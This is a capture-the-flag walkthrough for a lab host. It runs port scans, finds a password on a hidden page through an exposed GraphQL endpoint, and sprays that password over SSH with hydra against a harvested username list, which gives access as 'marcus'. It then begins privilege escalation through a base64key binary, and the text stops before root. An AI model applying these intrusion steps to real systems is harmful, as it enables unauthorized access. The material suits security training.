$ nmap -p- --min-rate 3000 192.168.183.139
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 15:03 +08
Nmap scan report for 192.168.183.139
Host is up (0.17s latency).
Not shown: 65524 closed tcp ports (conn-refused)
PORT STATE SERVICE
2500/tcp filtered rtsserv
4907/tcp filtered unknown
8080/tcp open http-proxy
18080/tcp open unknown
30330/tcp open unknown
36123/tcp open unknown
38439/tcp open unknown
42022/tcp open unknown
42086/tcp filtered unknown
50400/tcp open unknown
56339/tcp filtered unknown
Lots of ports open. Did a detailed scan as well:
$ sudo nmap -p 8080,18080,30330,36123,38439,42022,50400 -sC -sV --min-rate 3000 192.168.183.139
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 15:05 +08
Nmap scan report for 192.168.183.139
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
8080/tcp open http nginx 1.14.1
|_http-server-header: nginx/1.14.1
|_http-title: Identity by HTML5 UP
|_http-open-proxy: Proxy might be redirecting requests
18080/tcp open http Apache httpd 2.4.37 ((centos))
|_http-title: CentOS \xE6\x8F\x90\xE4\xBE\x9B\xE7\x9A\x84 Apache HTTP \xE6\x9C\x8D\xE5\x8A\xA1\xE5\x99\xA8\xE6\xB5\x8B\xE8\xAF\x95\xE9\xA1\xB5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
30330/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-cors: HEAD GET POST PUT DELETE PATCH
36123/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-cors: HEAD GET POST PUT DELETE PATCH
38439/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, ms-sql-s, oracle-tns:
| HTTP/1.1 400 Bad Request
|_ Connection: close
42022/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 cc2151f2c62aadd6ca0704de705ffa13 (RSA)
| 256 05e490d2002b9d14e39f4468d28ebcdc (ECDSA)
|_ 256 ca804973f0c805aebd2b42371d13e071 (ED25519)
50400/tcp open http Node.js Express framework
|_http-title: Error
|_http-cors: HEAD GET POST PUT DELETE PATCH
Web Enum -> GraphQL
Port 8080 shows a portfolio page:
It was rather static, so I moved to port 30330. This page had some book reviews:
This page looked more dynamic, so I ran a directory scan with feroxbuster, which found nothing of interest. Since we couldn't find anything with wordlists, I took a look through the local files:
There were a few interesting folders:
There wasn't much within the folders. On the 'Using Typescript' page, there was a link to documentation:
On the documentation page, there was mention of GraphQL being used, and sure enough /__graphql was a valid directory on the website as per the documentation:
The left had some queries already valid, so I checked those out. Using the allSitePage reveals all directories, including a hidden one:
Visiting it reveals a password:
This was a password to a Minecraft server. We didn't have a user, but the Minecraft page had some that we could try:
Minecraft: The Island by Max Brooks, #1 New York Times bestselling author of World War Z, is the first official Minecraft novel. In the tradition of iconic stories like Robinson Crusoe and Treasure Island, Minecraft: The Island will tell the story of a new hero stranded in the world of Minecraft, who must survive the harsh, unfamiliar environment and unravel the secrets of the island.
We loved this book so much that created a server. Already invited and added keralis, xisuma, zombiecleo, mumbojumbo, and waiting for a reply on the entire hermicraft clan. There is a limit on the server, but at least sabel, yvette, zahara, sybilla, marcus, tabbatha and tabby are already online and building.
Good luck everybody!
We can gather all the usernames into one wordlist:
$ hydra -L users -p WallAskCharacter305 192.168.183.139 ssh -s 42022
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-12 15:20:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 11 tasks per 1 server, overall 11 tasks, 11 login tries (l:11/p:1), ~1 try per task
[DATA] attacking ssh://192.168.183.139:42022/
[42022][ssh] host: 192.168.183.139 login: marcus password: WallAskCharacter305
We can then ssh in as marcus:
Privilege Escalation
.bash -> Base64key Root Creds
There was a weird folder .bash within the user's home directory:
[marcus@catto ~]$ ls -la
total 20
drwx------ 5 marcus marcus 167 Nov 25 2020 .
drwxr-xr-x. 3 root root 20 Nov 25 2020 ..
-rw-r--r-- 1 root root 29 Nov 25 2020 .bash
-rw------- 1 marcus marcus 0 Apr 14 2021 .bash_history
-rw-r--r-- 1 marcus marcus 18 Nov 8 2019 .bash_logout
-rw-r--r-- 1 marcus marcus 141 Nov 8 2019 .bash_profile
-rw-r--r-- 1 marcus marcus 312 Nov 8 2019 .bashrc
drwx------ 4 marcus marcus 39 Nov 25 2020 .config
drwxr-xr-x 6 marcus marcus 328 Nov 25 2020 gatsby-blog-starter
-rw------- 1 marcus marcus 33 Jul 12 06:59 local.txt
drwxrwxr-x 4 marcus marcus 69 Nov 25 2020 .npm
[marcus@catto ~]$ cat .bash
F2jJDWaNin8pdk93RLzkdOTr60==
This string looked like base64 but it wasn't. I looked at other binaries with base as part of their name:
[marcus@catto ~]$ base
base32 base64 base64key basename
base64key required a private key to decrypt, so I just tried the user's password and it worked:
